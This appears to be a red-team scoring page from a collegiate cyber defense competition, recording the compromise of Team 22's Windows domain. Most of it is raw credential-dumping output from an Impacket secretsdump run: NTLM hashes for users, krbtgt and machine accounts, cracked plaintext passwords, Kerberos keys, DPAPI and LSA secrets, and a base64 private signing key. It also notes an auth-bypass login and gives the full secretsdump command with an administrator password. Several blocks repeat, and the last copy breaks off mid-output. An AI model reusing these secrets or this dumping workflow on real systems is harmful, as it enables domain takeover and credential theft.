Team Information
- Number
- Team 22
- Name
- Threat Hunters
- IP Range
- 96.2.101.0/24
- Domain
- team22.isucdc.com
- Current Place
- 22nd
- Red Teamer(s)
- Austin S.
Flag Status
| Blue Flags |
|---|
| AD C:\Windows\System32\ TICKETS C:\Windows\System32\ MGMT /etc/ ADMIN C:\Windows\System32\ WWW /etc/ TICKETS Forged ticket MGMT DB Read MGMT Bus service MGMT Train service |
| Red Flags |
|---|
| AD C:\Users\Administrator\ TICKETS C:\Users\Administrator\ MGMT /root/ ADMIN C:\Users\Administrator\ WWW /root/ |
Service Status
| AD LDAP |
| AD RDP |
| AD LDAPS |
| TICKETS HTTP |
| TICKETS RDP |
| MGMT HTTP |
| MGMT SSH |
| ADMIN HTTP |
| ADMIN RDP |
| WWW HTTP |
| WWW SSH |
| ADMIN Login |
| WWW Login |
Nmap
Add content here...
Notable Vulnerabilities
=========================================
📁 Folder: ./team22
📄 File: secretdumps.txt
=========================================
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf75a32baf8b5405916b69035469d855:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0ee0a40b55ebe4e13f155429012bf031:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
melissa.robles:1107:aad3b435b51404eeaad3b435b51404ee:c82a791957fc5e6fcc4098c0b7b71326:::
roger.cox:1108:aad3b435b51404eeaad3b435b51404ee:6d936490e906ab3cb86cc21f3dd469f2:::
edward.matthews:1109:aad3b435b51404eeaad3b435b51404ee:dcd5072de595c8dd679bd68e17f873e9:::
joy.newman:1110:aad3b435b51404eeaad3b435b51404ee:e6b09f8e0e84b89b6d64807c3168f98b:::
andrea.hall:1111:aad3b435b51404eeaad3b435b51404ee:bbd782b0452616651c71ca688a2a3e93:::
geoffrey.mitchell:1112:aad3b435b51404eeaad3b435b51404ee:e87e42c53256b51c248a7d882d0f2cb4:::
joann.wilson:1113:aad3b435b51404eeaad3b435b51404ee:5ca1aea2a367758ad1c79b19b687e669:::
leslie.brady:1114:aad3b435b51404eeaad3b435b51404ee:6c8af32cee576cce1858717ca0146851:::
michael.miranda:1115:aad3b435b51404eeaad3b435b51404ee:56b98453f23daf8db103efe6607c03c7:::
krystal.gray:1116:aad3b435b51404eeaad3b435b51404ee:dfeb6f127bb73feb4332840960c4c31d:::
team22.isucdc.com\greenteamlumi:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\asdasd:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\greenteamtestlum:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\signupyeah:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
AD$:1000:aad3b435b51404eeaad3b435b51404ee:c098ac2d55937110a5609acb7d269602:::
WIN-1MTF2UIC2KK$:1117:aad3b435b51404eeaad3b435b51404ee:5d58ac87905703ebc819560d292e719c:::
MGMT$:1118:aad3b435b51404eeaad3b435b51404ee:7c37d3f00124afe2a04ec7514a6a2e0e:::
WIN-GVCAVB1E38T$:1119:aad3b435b51404eeaad3b435b51404ee:94e94bc4538134c8b16c5b8774143b01:::
WWW$:1120:aad3b435b51404eeaad3b435b51404ee:5c9ef24748bfe219de3d8aab01aeb751:::
[*] Cleaning up...
Administrator cdc 6aa15b3d14492d3fa4aa7c5e9cdc0e6a
melissa.robles dup992roc c82a791957fc5e6fcc4098c0b7b71326
roger.cox buy512voy 6d936490e906ab3cb86cc21f3dd469f2
edward.matthews sol768wop dcd5072de595c8dd679bd68e17f873e9
andrea.hall bek977vud bbd782b0452616651c71ca688a2a3e93
joy.newman got767dec e6b09f8e0e84b89b6d64807c3168f98b
geoffrey.mitchell kuy868zaj e87e42c53256b51c248a7d882d0f2cb4
leslie.brady juicec2245 6c8af32cee576cce1858717ca0146851
📁 Folder: ./team22
📄 File: secretdumps.txt
=========================================
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:cf75a32baf8b5405916b69035469d855:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0ee0a40b55ebe4e13f155429012bf031:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
melissa.robles:1107:aad3b435b51404eeaad3b435b51404ee:c82a791957fc5e6fcc4098c0b7b71326:::
roger.cox:1108:aad3b435b51404eeaad3b435b51404ee:6d936490e906ab3cb86cc21f3dd469f2:::
edward.matthews:1109:aad3b435b51404eeaad3b435b51404ee:dcd5072de595c8dd679bd68e17f873e9:::
joy.newman:1110:aad3b435b51404eeaad3b435b51404ee:e6b09f8e0e84b89b6d64807c3168f98b:::
andrea.hall:1111:aad3b435b51404eeaad3b435b51404ee:bbd782b0452616651c71ca688a2a3e93:::
geoffrey.mitchell:1112:aad3b435b51404eeaad3b435b51404ee:e87e42c53256b51c248a7d882d0f2cb4:::
joann.wilson:1113:aad3b435b51404eeaad3b435b51404ee:5ca1aea2a367758ad1c79b19b687e669:::
leslie.brady:1114:aad3b435b51404eeaad3b435b51404ee:6c8af32cee576cce1858717ca0146851:::
michael.miranda:1115:aad3b435b51404eeaad3b435b51404ee:56b98453f23daf8db103efe6607c03c7:::
krystal.gray:1116:aad3b435b51404eeaad3b435b51404ee:dfeb6f127bb73feb4332840960c4c31d:::
team22.isucdc.com\greenteamlumi:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\asdasd:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\greenteamtestlum:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\signupyeah:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
AD$:1000:aad3b435b51404eeaad3b435b51404ee:c098ac2d55937110a5609acb7d269602:::
WIN-1MTF2UIC2KK$:1117:aad3b435b51404eeaad3b435b51404ee:5d58ac87905703ebc819560d292e719c:::
MGMT$:1118:aad3b435b51404eeaad3b435b51404ee:7c37d3f00124afe2a04ec7514a6a2e0e:::
WIN-GVCAVB1E38T$:1119:aad3b435b51404eeaad3b435b51404ee:94e94bc4538134c8b16c5b8774143b01:::
WWW$:1120:aad3b435b51404eeaad3b435b51404ee:5c9ef24748bfe219de3d8aab01aeb751:::
[*] Cleaning up...
Administrator cdc 6aa15b3d14492d3fa4aa7c5e9cdc0e6a
melissa.robles dup992roc c82a791957fc5e6fcc4098c0b7b71326
roger.cox buy512voy 6d936490e906ab3cb86cc21f3dd469f2
edward.matthews sol768wop dcd5072de595c8dd679bd68e17f873e9
andrea.hall bek977vud bbd782b0452616651c71ca688a2a3e93
joy.newman got767dec e6b09f8e0e84b89b6d64807c3168f98b
geoffrey.mitchell kuy868zaj e87e42c53256b51c248a7d882d0f2cb4
leslie.brady juicec2245 6c8af32cee576cce1858717ca0146851
Private signing key for tickets:
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
Administrator cdc 6aa15b3d14492d3fa4aa7c5e9cdc0e6a
melissa.robles dup992roc c82a791957fc5e6fcc4098c0b7b71326
roger.cox buy512voy 6d936490e906ab3cb86cc21f3dd469f2
edward.matthews sol768wop dcd5072de595c8dd679bd68e17f873e9
joy.newman got767dec e6b09f8e0e84b89b6d64807c3168f98b
andrea.hall bek977vud bbd782b0452616651c71ca688a2a3e93
geoffrey.mitchell kuy868zaj e87e42c53256b51c248a7d882d0f2cb4
leslie.brady juicec2245 6c8af32cee576cce1858717ca0146851
Administrator cdc 6aa15b3d14492d3fa4aa7c5e9cdc0e6a
melissa.robles dup992roc c82a791957fc5e6fcc4098c0b7b71326
roger.cox buy512voy 6d936490e906ab3cb86cc21f3dd469f2
edward.matthews sol768wop dcd5072de595c8dd679bd68e17f873e9
joy.newman got767dec e6b09f8e0e84b89b6d64807c3168f98b
andrea.hall bek977vud bbd782b0452616651c71ca688a2a3e93
geoffrey.mitchell kuy868zaj e87e42c53256b51c248a7d882d0f2cb4
leslie.brady juicec2245 6c8af32cee576cce1858717ca0146851
Abused auth bypass vulnerability in /auth/login backend endpoint to sign in as Administrator
Used /auth/change-password to change administrator password to the one that Tom Pohl has been using
impacket-secretsdump team22.isucdc.com/administrator:'Qweasd123!'@team22.isucdc.com -dc-ip ad.team22.isucdc.com
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xfac88d11933d610b3e0beed126b88abb
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM22\AD$:aes256-cts-hmac-sha1-96:29c339bc2772e2ee8a74f044b02d7d1bd0b87893c09695c622b68df6ad08ff5f
TEAM22\AD$:aes128-cts-hmac-sha1-96:278dadb28749ae455973d8c7644cb824
TEAM22\AD$:des-cbc-md5:64e3f22cc22cc857
TEAM22\AD$:plain_password_hex:35543e1db477c959c2fc253a0422996b0c03f0e376d2c9d59c18459fb31ddf81f24442cca3600f4f81bc534661eb9ae91b9b4b3ee88f6426359bd63365388e77f2154ca9efa7efa9e74ffc7ec35d80408f65c91a1f78d156b07205164d47663eb8cfe39cdef005a117c7fffbba8ce471f2adff1b0700deb6eb6c7a88e8756871461316a6494218558764fdd226d3f70c29bcd2cbc1cb35261b24f0ced579f37c13fa54b0f9a7d4419946de37d253e9ad6e5d9ecb741bbaf2006d74ea303aaf9903a605f8b8f3f20698d496588eb38ef874656aef66d39775282fcd6409621e3e923a7c08f66ba372abbea73690be3e72
TEAM22\AD$:aad3b435b51404eeaad3b435b51404ee:c098ac2d55937110a5609acb7d269602:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xcec01439661532d2f7501ba4b93dc76108de722f
dpapi_userkey:0xa81d8a99eb4d62a8c7985fe148a5d0bf640cc00e
[*] NL$KM
0000 C8 EA 14 88 37 90 F7 EB 52 F8 C7 76 AC DA 62 6E ....7...R..v..bn
0010 45 4B 30 A7 15 FD 5B 26 99 8A BF B8 5F 41 D5 1F EK0...[&...._A..
0020 DB D2 98 54 18 2A 8B 2F E1 0F E6 7A 9A BB 9C 0F ...T.*./...z....
0030 B5 28 1D 3D 3B CA 2C D5 13 69 4B AB A4 4C 78 78 .(.=;.,..iK..Lxx
NL$KM:c8ea14883790f7eb52f8c776acda626e454b30a715fd5b26998abfb85f41d51fdbd29854182a8b2fe10fe67a9abb9c0fb5281d3d3bca2cd513694baba44c7878
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2ed14c09e4342b6697ad42b04ed86068:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0ee0a40b55ebe4e13f155429012bf031:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
melissa.robles:1107:aad3b435b51404eeaad3b435b51404ee:c82a791957fc5e6fcc4098c0b7b71326:::
roger.cox:1108:aad3b435b51404eeaad3b435b51404ee:6d936490e906ab3cb86cc21f3dd469f2:::
edward.matthews:1109:aad3b435b51404eeaad3b435b51404ee:dcd5072de595c8dd679bd68e17f873e9:::
joy.newman:1110:aad3b435b51404eeaad3b435b51404ee:e6b09f8e0e84b89b6d64807c3168f98b:::
andrea.hall:1111:aad3b435b51404eeaad3b435b51404ee:bbd782b0452616651c71ca688a2a3e93:::
geoffrey.mitchell:1112:aad3b435b51404eeaad3b435b51404ee:e87e42c53256b51c248a7d882d0f2cb4:::
joann.wilson:1113:aad3b435b51404eeaad3b435b51404ee:5ca1aea2a367758ad1c79b19b687e669:::
leslie.brady:1114:aad3b435b51404eeaad3b435b51404ee:6c8af32cee576cce1858717ca0146851:::
michael.miranda:1115:aad3b435b51404eeaad3b435b51404ee:56b98453f23daf8db103efe6607c03c7:::
krystal.gray:1116:aad3b435b51404eeaad3b435b51404ee:dfeb6f127bb73feb4332840960c4c31d:::
team22.isucdc.com\greenteamlumi:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\asdasd:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\greenteamtestlum:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\signupyeah:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
team22.isucdc.com\sam:1601:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
AD$:1000:aad3b435b51404eeaad3b435b51404ee:c098ac2d55937110a5609acb7d269602:::
WIN-1MTF2UIC2KK$:1117:aad3b435b51404eeaad3b435b51404ee:5d58ac87905703ebc819560d292e719c:::
MGMT$:1118:aad3b435b51404eeaad3b435b51404ee:7c37d3f00124afe2a04ec7514a6a2e0e:::
WIN-GVCAVB1E38T$:1119:aad3b435b51404eeaad3b435b51404ee:94e94bc4538134c8b16c5b8774143b01:::
WWW$:1120:aad3b435b51404eeaad3b435b51404ee:5c9ef24748bfe219de3d8aab01aeb751:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:1c65fdf874751c539e53b4bebcb80c752ac6f02a22d1c4de6cc3d9920283d12e
Administrator:aes128-cts-hmac-sha1-96:bdc8e5c0ba90ae729338b9fa272b6349
Administrator:des-cbc-md5:7aa467326826fbd6
krbtgt:aes256-cts-hmac-sha1-96:77b281a8f7c8f31a453ab56c152e8e1639864c19bb09a7d2922755e744b890a6
krbtgt:aes128-cts-hmac-sha1-96:2339f20224e44ea161da3194e099fa0e
krbtgt:des-cbc-md5:bc9ec4c1a12cdcd3
melissa.robles:aes256-cts-hmac-sha1-96:299785149a23b566022d1f4f3ae5536243149c2108578216b2cd429842c105d1
melissa.robles:aes128-cts-hmac-sha1-96:08298eefef5d30f567ba40fc98baff68
melissa.robles:des-cbc-md5:1a522cf46b43750d
roger.cox:aes256-cts-hmac-sha1-96:fe4a9ca205fcedebc595a3b395e018607a895ae04e7828d34c67d97a9222f3b9
roger.cox:aes128-cts-hmac-sha1-96:2b5385ff35c4614e916b14953b943f89
roger.cox:des-cbc-md5:bc798c892c1f6b43
edward.matthews:aes256-cts-hmac-sha1-96:fa043835d75cba9cf0acc82020bc24f0bba8f5e6f90cd5bf8c07387b86f1e91d
edward.matthews:aes128-cts-hmac-sha1-96:4564a6ebf641cbc0d1a30f0d8337d972
edward.matthews:des-cbc-md5:bfbc150402d93ea4
joy.newman:aes256-cts-hmac-sha1-96:261fc9b5d00ccfc41a7050aed4569c7251a3885d22d726cb4abb014de75df722
joy.newman:aes128-cts-hmac-sha1-96:e0a9652050bfb2125fc7450be8ede1d7
joy.newman:des-cbc-md5:34138a2620cd292f
andrea.hall:aes256-cts-hmac-sha1-96:80680c00cce95bcdfa2714b923679eb1a9b5a38c4a2f9aa0ec52bb2e25f8a217
andrea.hall:aes128-cts-hmac-sha1-96:144c26eb5ae02758f1da642d982cef31
andrea.hall:des-cbc-md5:525e6e3d91522504
geoffrey.mitchell:aes256-cts-hmac-sha1-96:faa4264f340388241b1ec37f5d9b5241179b43be3a7876381ca78d6e8fa2d327
geoffrey.mitchell:aes128-cts-hmac-sha1-96:09624d8f4dc5e1a72239954db57fcbeb
geoffrey.mitchell:des-cbc-md5:6dbfec5bba97543e
joann.wilson:aes256-cts-hmac-sha1-96:026521fe9b4140f4b079531892e6f9fae497bacbe35bea5dd4be01481af6dab1
joann.wilson:aes128-cts-hmac-sha1-96:801dd50d76fbf77ebb589b763428d2e0
joann.wilson:des-cbc-md5:c81c38e3678fdcce
leslie.brady:aes256-cts-hmac-sha1-96:eabea15aaff72286889d2cbd76159627ed17bd9f8030dc22b90b481e0e28af8e
leslie.brady:aes128-cts-hmac-sha1-96:11fc0ce62140bdfba0ca438012d4fbc1
leslie.brady:des-cbc-md5:dfdf29ce7991cd7f
michael.miranda:aes256-cts-hmac-sha1-96:4b83f670976cbf2e7e2a33a46a678e3d525da58d790c0dceb5ef9d1ee07cb32a
michael.miranda:aes128-cts-hmac-sha1-96:22ddf4dccccc6a900eb12685c25811e1
michael.miranda:des-cbc-md5:9ef8b32fd3ce83ad
krystal.gray:aes256-cts-hmac-sha1-96:003d35dcde791b121946534415ecb4db445a333a9f4c5efbe74655a6a46dbed9
krystal.gray:aes128-cts-hmac-sha1-96:facd451e53d3ddfbd60575ad60916cce
krystal.gray:des-cbc-md5:1cd06ea240dc6d51
AD$:aes256-cts-hmac-sha1-96:29c339bc2772e2ee8a74f044b02d7d1bd0b87893c09695c622b68df6ad08ff5f
AD$:aes128-cts-hmac-sha1-96:278dadb28749ae455973d8c7644cb824
AD$:des-cbc-md5:e3106ba7762cf270
WIN-1MTF2UIC2KK$:aes256-cts-hmac-sha1-96:228cb0ac8653998245132acdb48955628373749cc282bd4e2c80e44fade5c2fa
WIN-1MTF2UIC2KK$:aes128-cts-hmac-sha1-96:af648e6463a9efef9753612838d2f19c
WIN-1MTF2UIC2KK$:des-cbc-md5:079489ce0880e96b
MGMT$:aes256-cts-hmac-sha1-96:094f5804e376b81dfb7b884a555343a0503f861c13010d82bb4cc5b31c6c75df
MGMT$:aes128-cts-hmac-sha1-96:95a2f3c3278df3bf7081900069d82814
MGMT$:des-cbc-md5:fd6726071ab026ab
WIN-GVCAVB1E38T$:aes256-cts-hmac-sha1-96:2fc4c6d085269a739bb87c6c635e831b6276efbedf231034cb7bd2e6b26989dc
WIN-GVCAVB1E38T$:aes128-cts-hmac-sha1-96:8b7899e80335dd52037c41f87f48e030
WIN-GVCAVB1E38T$:des-cbc-md5:fb891a5208258a8c
WWW$:aes256-cts-hmac-sha1-96:07c822b72f0e58101bafb60b09ec0f7744f9082a6bb9e568ea01fa2dbcdf5218
WWW$:aes128-cts-hmac-sha1-96:92989e2f776b0980fd18ab23040c3b5a
WWW$:des-cbc-md5:7cad623b3d2f2ada
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xfac88d11933d610b3e0beed126b88abb
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6aa15b3d14492d3fa4aa7c5e9cdc0e6a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
TEAM22\AD$:aes256-cts-hmac-sha1-96:29c339bc2772e2ee8a74f044b02d7d1bd0b87893c09695c622b68df6ad08ff5f
TEAM22\AD$:aes128-cts-hmac-sha1-96:278dadb28749ae455973d8c7644cb824
TEAM22\AD$:des-cbc-md5:64e3f22cc22cc857
TEAM22\AD$:plain_password_hex:35543e1db477c959c2fc253a0422996b0c03f0e376d2c9d59c18459fb31ddf81f24442cca3600f4f81bc534661eb9ae91b9b4b3ee88f6426359bd63365388e77f2154ca9efa7efa9e74ffc7ec35d80408f65c91a1f78d156b07205164d47663eb8cfe39cdef005a117c7fffbba8ce471f2adff1b0700deb6eb6c7a88e8756871461316a6494218558764fdd226d3f70c29bcd2cbc1cb35261b24f0ced579f37c13fa54b0f9a7d4419946de37d253e9ad6e5d9ecb741bbaf2006d74ea303aaf9903a605f8b8f3f20698d496588eb38ef874656aef66d39775282fcd6409621e3e923a7c08f66ba372abbea73690be3e72
TEAM22\AD$:aad3b435b51404eeaad3b435b51404ee:c098ac2d55937110a5609acb7d269602:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xcec01439661532d2f7501ba4b93dc76108de722f
dpapi_userkey:0xa81d8a99eb4d62a8c7985fe148a5d0bf640cc00e
[*] NL$KM
0000 C8 EA 14 88 37 90 F7 EB 52 F8 C7 76 AC DA 62 6E ....7...R..v..bn
0010 45 4B 30 A7 15 FD 5B 26 99 8A BF B8 5F 41 D5 1F EK0...[&...._A..
0020 DB D2 98 54 18 2A 8B 2F E1 0F E6 7A 9A BB 9C 0F ...T.*./...z....
